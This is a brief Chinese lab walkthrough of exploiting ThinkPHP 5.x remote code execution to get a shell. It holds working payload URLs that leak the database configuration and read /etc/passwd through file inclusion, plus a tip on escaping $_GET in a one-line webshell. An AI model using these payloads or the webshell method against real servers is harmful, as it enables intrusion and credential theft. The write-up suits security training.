漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场
第二步:准备工具
第三步:启动工具,进行漏洞检测
#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞2.目标存在tp5_dbinfo_leak漏洞payload:http://47.103.81.25:8080?s=index/think\config/get&name=database.hostnamehostname: 127.0.0.1, hostport: , database: , username: , password: root3.目标存在tp5_file_include漏洞payload: http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞
第五步:查看tp5_file_include漏洞
第六步:尝试GetShell
注意:
如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符
FROM IYU_